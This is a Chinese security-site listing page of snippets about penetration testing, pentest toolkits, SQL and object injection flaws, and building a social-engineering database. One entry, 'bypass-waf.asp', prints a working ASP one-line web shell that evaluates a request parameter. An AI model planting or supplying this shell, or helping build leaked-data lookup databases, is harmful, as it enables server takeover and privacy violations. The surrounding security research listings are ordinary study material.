简介 这是web渗透练习的第二篇文章,有关第一篇文章的翻译可以在这里查看:http://www.freebuf.com/articles/web/52413.html,原文在这里:http://r...
神兵利刃
神兵利刃
网络安全
微软:暴力破解面前,增强密码复杂性基本没用
我们都痛恨密码,然而不幸的是在当下及可以看见的未来里,账户登录等在线认证操作的主要方法还是需要使用密码的。密码认证有时确实比较烦人,尤其是一些网站为了密码安全性,要求我们在设置密码时必须包含大小写字母...
神兵利刃
暗组2015最新渗透包
暗组2015扩展包:需要到论坛自行下载并添加即可: 暗组2015\Tools\安全检测\综合扫描\大型扫描器 暗组2015\Tools\安全检测\高级攻防\WinHac...
渗透测试软件:altman3
官方介绍: Altman3 免责申明:本程序仅供学习和研究! 请使用者遵守国家相关法律法规! 由于使用不当造成的后果本人不承担任何责任! 介绍&nbs...
bypass-waf.asp
<%dim x1,x2x1 = request("pass")x2 = x1eval x2%> <!-- yes++ --><!-- 一句话 pass...
网络安全
一个人的武林:渗透测试常规思路分析(一)|
写在前面 渗透测试是门技术,也是一门艺术。 这门技术(艺术)一开始也不是每个人都会的,正所谓没有人一出生就会走路,从不懂到入门到深谙,一步步慢慢来,每个人都是这样;但是在这个过程中,思路无疑是最重要的...
网络安全
经验分享:社会工程学数据库搭建TIPS
最近一直在搞社工库的搭建。网上这方面也有很多文章,但是很少涉及到细节,在此与大家分享一些个人心得。 测试环境 测试坏境:windows server 2012(x64,16G&nb...
DataBase
IP.Board3.4.5中SQL注入漏洞的利用与分析
之前在FREEBUF上看到一篇文章,题目是《IP.Board<=3.4.7SQL注入漏洞(0day)POC》,对这个话题比较感兴趣,搭建了实验环境,进行了实验,便有了此文。 一、背景信息 首先先...
系统文档
偏门系统拾遗:Tru64Unix系统搭建渗透指南
随着虚拟化技术的不断发展,给我们带来了越来越多的便利,让我们几乎可以模拟任何我们呢可以想到的设备。这里我们就利用这高超的虚拟化技术来摸拟一个并不是那么常用的操作系统Tru64Ubix操作系统,同时使用...
漏洞分享
技术分析:剖析HikaShopPHP对象注入漏洞
HikaShop是基于著名开源CMSJoomla!的电子商务程序,可以帮助用户轻松的开发电子商务网站或网店。 距离上次我们发现Joomla!的HikaShop扩展对象注入漏洞(影响版本<2.3....
